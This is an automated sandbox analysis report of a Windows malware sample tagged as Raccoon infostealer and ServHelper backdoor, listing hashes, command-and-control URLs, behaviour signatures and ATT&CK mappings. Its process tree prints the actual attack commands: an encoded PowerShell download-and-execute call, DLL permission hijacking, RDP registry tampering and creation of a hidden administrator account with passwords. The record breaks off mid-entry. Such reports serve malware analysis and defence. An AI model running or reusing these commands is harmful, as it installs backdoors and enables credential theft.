Analysis

  • max time kernel
    121s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    03-06-2021 13:06

General

  • Target

    66ee84542266e55c0215ca60869f1347.exe

  • Size

    567KB

  • MD5

    66ee84542266e55c0215ca60869f1347

  • SHA1

    147b6dd6bd7b0c5060ded97b844bb1494cf1ddb6

  • SHA256

    143cf1724057f9b6a6630656e8735857d6146ff6dd0c2afc736545b46194437c

  • SHA512

    ead9fc39d6fc972587b777151b040885b7df8eb4ea2bf305f259243915ef2bd190c9e4ea36999442b59b52054a75f07df9d8dd3f380841bb27a13c587b6da2ad

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

raccoon

Botnet

89ac909b803bacbc6cc523520599c4b9c029b033

Attributes
  • url4cnc

    https://tttttt.me/jdiamond13

rc4.plain
rc4.plain

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 12 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 21 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\66ee84542266e55c0215ca60869f1347.exe
    "C:\Users\Admin\AppData\Local\Temp\66ee84542266e55c0215ca60869f1347.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1612
    • C:\Users\Admin\AppData\Local\Temp\QyeaZkZMby.exe
      "C:\Users\Admin\AppData\Local\Temp\QyeaZkZMby.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        3⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1548
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h2niipx3\h2niipx3.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:316
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC08.tmp" "c:\Users\Admin\AppData\Local\Temp\h2niipx3\CSC22AB542D93C545F48A70C4EFE97B3FE4.TMP"
            5⤵
              PID:1120
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2044
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1324
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1012
          • C:\Windows\system32\takeown.exe
            "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:684
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1100
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1620
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1068
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1108
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:584
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1388
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:952
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            4⤵
              PID:1708
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
              4⤵
              • Modifies registry key
              PID:888
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
              4⤵
                PID:1596
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:752
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                    5⤵
                      PID:1568
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                    4⤵
                      PID:1636
                      • C:\Windows\system32\cmd.exe
                        cmd /c net start rdpdr
                        5⤵
                          PID:1084
                          • C:\Windows\system32\net.exe
                            net start rdpdr
                            6⤵
                              PID:488
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 start rdpdr
                                7⤵
                                  PID:1012
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                            4⤵
                              PID:1028
                              • C:\Windows\system32\cmd.exe
                                cmd /c net start TermService
                                5⤵
                                  PID:1824
                                  • C:\Windows\system32\net.exe
                                    net start TermService
                                    6⤵
                                      PID:1592
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 start TermService
                                        7⤵
                                          PID:1760
                                  • C:\Windows\system32\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                    4⤵
                                      PID:520
                                    • C:\Windows\system32\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                      4⤵
                                        PID:968
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\66ee84542266e55c0215ca60869f1347.exe"
                                    2⤵
                                    • Deletes itself
                                    • Suspicious use of WriteProcessMemory
                                    PID:1760
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /T 10 /NOBREAK
                                      3⤵
                                      • Delays execution with timeout.exe
                                      PID:1068
                                • C:\Windows\System32\cmd.exe
                                  cmd /C net.exe user wgautilacc Ghar4f5 /del
                                  1⤵
                                    PID:584
                                    • C:\Windows\system32\net.exe
                                      net.exe user wgautilacc Ghar4f5 /del
                                      2⤵
                                        PID:1112
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                                          3⤵
                                            PID:1584
                                      • C:\Windows\System32\cmd.exe
                                        cmd /C net.exe user wgautilacc 7Q9LYp2y /add
                                        1⤵
                                          PID:856
                                          • C:\Windows\system32\net.exe
                                            net.exe user wgautilacc 7Q9LYp2y /add
                                            2⤵
                                              PID:868
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 user wgautilacc 7Q9LYp2y /add
                                                3⤵
                                                  PID:540
                                            • C:\Windows\System32\cmd.exe
                                              cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                              1⤵
                                                PID:1176
                                                • C:\Windows\system32\net.exe
                                                  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                                  2⤵
                                                    PID:108
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                                      3⤵
                                                        PID:684
                                                  • C:\Windows\System32\cmd.exe
                                                    cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
                                                    1⤵
                                                      PID:1696
                                                      • C:\Windows\system32\net.exe
                                                        net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
                                                        2⤵
                                                          PID:1112
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
                                                            3⤵
                                                              PID:368
                                                        • C:\Windows\System32\cmd.exe
                                                          cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                          1⤵
                                                            PID:752
                                                            • C:\Windows\system32\net.exe
                                                              net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                              2⤵
                                                                PID:868
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                                                  3⤵
                                                                    PID:540
                                                              • C:\Windows\System32\cmd.exe
                                                                cmd /C net.exe user wgautilacc 7Q9LYp2y
                                                                1⤵
                                                                  PID:1104
                                                                  • C:\Windows\system32\net.exe
                                                                    net.exe user wgautilacc 7Q9LYp2y
                                                                    2⤵
                                                                      PID:108
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 user wgautilacc 7Q9LYp2y
                                                                        3⤵
                                                                          PID:1176
                                                                    • C:\Windows\System32\cmd.exe
                                                                      cmd.exe /C wmic path win32_VideoController get name
                                                                      1⤵
                                                                        PID:968
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic path win32_VideoController get name
                                                                          2⤵
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1696
                                                                      • C:\Windows\System32\cmd.exe
                                                                        cmd.exe /C wmic CPU get NAME
                                                                        1⤵
                                                                          PID:976
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic CPU get NAME
                                                                            2⤵
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1740
                                                                        • C:\Windows\System32\cmd.exe
                                                                          cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                          1⤵
                                                                            PID:1636
                                                                            • C:\Windows\system32\cmd.exe
                                                                              cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                              2⤵
                                                                                PID:1584
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                  3⤵
                                                                                  • Blocklisted process makes network request
                                                                                  • Drops file in Windows directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:868
                                                                            • C:\Windows\System32\cmd.exe
                                                                              cmd.exe /C net user wgautilacc 1234
                                                                              1⤵
                                                                                PID:112
                                                                                • C:\Windows\system32\net.exe
                                                                                  net user wgautilacc 1234
                                                                                  2⤵
                                                                                    PID:1536
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 user wgautilacc 1234
                                                                                      3⤵
                                                                                        PID:1824

                                                                                  Network

                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                  Persistence

                                                                                  Account Manipulation

                                                                                  1
                                                                                  T1098

                                                                                  Registry Run Keys / Startup Folder

                                                                                  1
                                                                                  T1060

                                                                                  Defense Evasion

                                                                                  Modify Registry

                                                                                  3
                                                                                  T1112

                                                                                  File Permissions Modification

                                                                                  1
                                                                                  T1222

                                                                                  Install Root Certificate

                                                                                  1
                                                                                  T1130

                                                                                  Credential Access

                                                                                  Credentials in Files

                                                                                  2
                                                                                  T1081

                                                                                  Discovery

                                                                                  Query Registry

                                                                                  1
                                                                                  T1012

                                                                                  System Information Discovery

                                                                                  1
                                                                                  T1082

                                                                                  Lateral Movement

                                                                                  Remote Desktop Protocol

                                                                                  1
                                                                                  T1076

                                                                                  Collection

                                                                                  Data from Local System

                                                                                  2
                                                                                  T1005

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_361e123b-10fd-4d93-86fc-0fe7448e2360
                                                                                    MD5

                                                                                    a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                                                                                    SHA1

                                                                                    81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                                                                                    SHA256

                                                                                    dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                                                                                    SHA512

                                                                                    8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5882aaed-7108-4323-9d96-b2fcd9354956
                                                                                    MD5

                                                                                    d89968acfbd0cd60b51df04860d99896

                                                                                    SHA1

                                                                                    b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                                                                                    SHA256

                                                                                    1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                                                                                    SHA512

                                                                                    b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5add974c-bfd9-47c7-8a89-8165968ccb3f
                                                                                    MD5

                                                                                    e5b3ba61c3cf07deda462c9b27eb4166

                                                                                    SHA1

                                                                                    b324dad73048be6e27467315f82b7a5c1438a1f9

                                                                                    SHA256

                                                                                    b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

                                                                                    SHA512

                                                                                    a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a9ee5f1b-24b4-4635-a75e-2594c4d5b6fb
                                                                                    MD5

                                                                                    2d5cd190b5db0620cd62e3cd6ba1dcd3

                                                                                    SHA1

                                                                                    ff4f229f4fbacccdf11d98c04ba756bda80aac7a

                                                                                    SHA256

                                                                                    ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

                                                                                    SHA512

                                                                                    edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e58bfc70-2923-410c-a118-5fe826d5cbcf
                                                                                    MD5

                                                                                    faa37917b36371249ac9fcf93317bf97

                                                                                    SHA1

                                                                                    a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

                                                                                    SHA256

                                                                                    b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

                                                                                    SHA512

                                                                                    614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ebe980d4-94aa-44db-9eac-316b0f7ce2b8
                                                                                    MD5

                                                                                    6f0d509e28be1af95ba237d4f43adab4

                                                                                    SHA1

                                                                                    c665febe79e435843553bee86a6cea731ce6c5e4

                                                                                    SHA256

                                                                                    f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

                                                                                    SHA512

                                                                                    8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f2a65fe8-5047-4c85-bb76-d51faed6baed
                                                                                    MD5

                                                                                    7f79b990cb5ed648f9e583fe35527aa7

                                                                                    SHA1

                                                                                    71b177b48c8bd745ef02c2affad79ca222da7c33

                                                                                    SHA256

                                                                                    080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                                                                                    SHA512

                                                                                    20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                                    MD5

                                                                                    901556a8c60ec8605b3abb3ac3d399de

                                                                                    SHA1

                                                                                    a73e07c66374c54bcabef9d1946f09b28c142e0a

                                                                                    SHA256

                                                                                    f7f87169d405fee2d9fb7a9117ed7c7cd2ac85f186b59f996c998b1ea01fb006

                                                                                    SHA512

                                                                                    a5a28a73bcf028c23d01837b3c5a72e6faf64dd77fefcea46d6b8811fa73eb734220894ffc1644013ed3fb2f1ef3b431365471b0d91213e1d9a8203923b5b070

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                                    MD5

                                                                                    d2eaf03354e438a62bb71a7a4d9320d3

                                                                                    SHA1

                                                                                    ad3e79e9ec57a1c2b7e46fc180824dc6c18f3594

                                                                                    SHA256

                                                                                    ea0376df8bc948cd420670acc99f629a3bfd84d4265392c2045612e9e18f79f7

                                                                                    SHA512

                                                                                    3f6e4a0ded8692c512faa39e6cf3b8cd9e688d380bbf689489140c9e621d6b0052af6aa5c5d904f2a0504791306e5d5c30eea4c2da70f05fce498b35d2303014

                                                                                  • C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1
                                                                                    MD5

                                                                                    b2207567c6a62b42655772770ce2a4e6

                                                                                    SHA1

                                                                                    51074ad655105f0c496f4017e8afee90d9cab900

                                                                                    SHA256

                                                                                    d7b206f39b6f6996cb9472df9fa350ab9da7f1eca47f782c4e5d05ca338daaab

                                                                                    SHA512

                                                                                    85d8eb5772d672b1e84b3f09048c207ed7ecaa7f68f14dc34baa34dd49ed0d674ff150eec20932e468a7a4d17d91d22caa639fe8d9bab0bed0105c4c38631bb5

                                                                                  • C:\Users\Admin\AppData\Local\Temp\QyeaZkZMby.exe
                                                                                    MD5

                                                                                    aa80d5960e65ac46ad446c09c1a17608

                                                                                    SHA1

                                                                                    c2468b1792e5ecef461d2d89470e8438c05cce24

                                                                                    SHA256

                                                                                    857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c

                                                                                    SHA512

                                                                                    07e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b

                                                                                  • C:\Users\Admin\AppData\Local\Temp\QyeaZkZMby.exe
                                                                                    MD5

                                                                                    aa80d5960e65ac46ad446c09c1a17608

                                                                                    SHA1

                                                                                    c2468b1792e5ecef461d2d89470e8438c05cce24

                                                                                    SHA256

                                                                                    857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c

                                                                                    SHA512

                                                                                    07e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RESAC08.tmp
                                                                                    MD5

                                                                                    e06f8c7739371f073def5d4c9c7d66d1

                                                                                    SHA1

                                                                                    7d12128df5f113185563e9733362a67d113a4c63

                                                                                    SHA256

                                                                                    dbbb9fa77285db564f2044b6c973a9a8ad131596c5f53b86e15444123ea1c848

                                                                                    SHA512

                                                                                    6c540609c11a5207a5d80083ad0ce10c483562bdc3819051e57f68d1a204280edd90e2bbe5e24d5ab9976d2fd2923c0a2c6506b7660da5f94c274cbb91d146ff

                                                                                  • C:\Users\Admin\AppData\Local\Temp\h2niipx3\h2niipx3.dll
                                                                                    MD5

                                                                                    69ff881828c0f097ec657b2de79f06a5

                                                                                    SHA1

                                                                                    5f3178f177beea62a76b839df96b1949409174b4

                                                                                    SHA256

                                                                                    635442b073f15e9c17debe0e3166cdea45d78436de76b74b2ae5d7b43c3009f8

                                                                                    SHA512

                                                                                    7a1bf4ce14d1692511158715aa3dd18b4a58b1e7706607606584642df0aab3ff3de374292cc73b7a9ab519c82da5cebfa49f9affd6a253dafd9ac4e9b752dc55

                                                                                  • C:\Users\Admin\AppData\Local\Temp\ready.ps1
                                                                                    MD5

                                                                                    065cc96fec70546c9f195f703e4d657b

                                                                                    SHA1

                                                                                    9da24636d8fd3de61f46ff7282640d3fa27d6b45

                                                                                    SHA256

                                                                                    cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3

                                                                                    SHA512

                                                                                    a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0

                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                                    MD5

                                                                                    8c80f0e40be0c8d28d1ef79a92dbbb34

                                                                                    SHA1

                                                                                    5b38f335d6001719b303fd724701f9f0f2fa8af5

                                                                                    SHA256

                                                                                    128727a3cc3b3c50c07eb602a442e2d909256ebe843dd98d5f2fe7eb6b0fbced

                                                                                    SHA512

                                                                                    2b68125f9731bd0871d42d4abfdf8d03dc576f0926db0ac020d8cd8dd437756a0b9ffe61231f1f2ce014df2110fe787452a98863bb1d4933f4b54657a9f5a2e4

                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                                    MD5

                                                                                    8c80f0e40be0c8d28d1ef79a92dbbb34

                                                                                    SHA1

                                                                                    5b38f335d6001719b303fd724701f9f0f2fa8af5

                                                                                    SHA256

                                                                                    128727a3cc3b3c50c07eb602a442e2d909256ebe843dd98d5f2fe7eb6b0fbced

                                                                                    SHA512

                                                                                    2b68125f9731bd0871d42d4abfdf8d03dc576f0926db0ac020d8cd8dd437756a0b9ffe61231f1f2ce014df2110fe787452a98863bb1d4933f4b54657a9f5a2e4

                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                                    MD5

                                                                                    8c80f0e40be0c8d28d1ef79a92dbbb34

                                                                                    SHA1

                                                                                    5b38f335d6001719b303fd724701f9f0f2fa8af5

                                                                                    SHA256

                                                                                    128727a3cc3b3c50c07eb602a442e2d909256ebe843dd98d5f2fe7eb6b0fbced

                                                                                    SHA512

                                                                                    2b68125f9731bd0871d42d4abfdf8d03dc576f0926db0ac020d8cd8dd437756a0b9ffe61231f1f2ce014df2110fe787452a98863bb1d4933f4b54657a9f5a2e4

                                                                                  • C:\Windows\system32\rfxvmt.dll
                                                                                    MD5

                                                                                    dc39d23e4c0e681fad7a3e1342a2843c

                                                                                    SHA1

                                                                                    58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                                    SHA256

                                                                                    6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                                    SHA512

                                                                                    5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                                  • \??\PIPE\lsarpc
                                                                                    MD5

                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                    SHA1

                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                    SHA256

                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                    SHA512

                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                  • \??\PIPE\lsarpc
                                                                                    MD5

                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                    SHA1

                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                    SHA256

                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                    SHA512

                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                  • \??\PIPE\wkssvc
                                                                                    MD5

                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                    SHA1

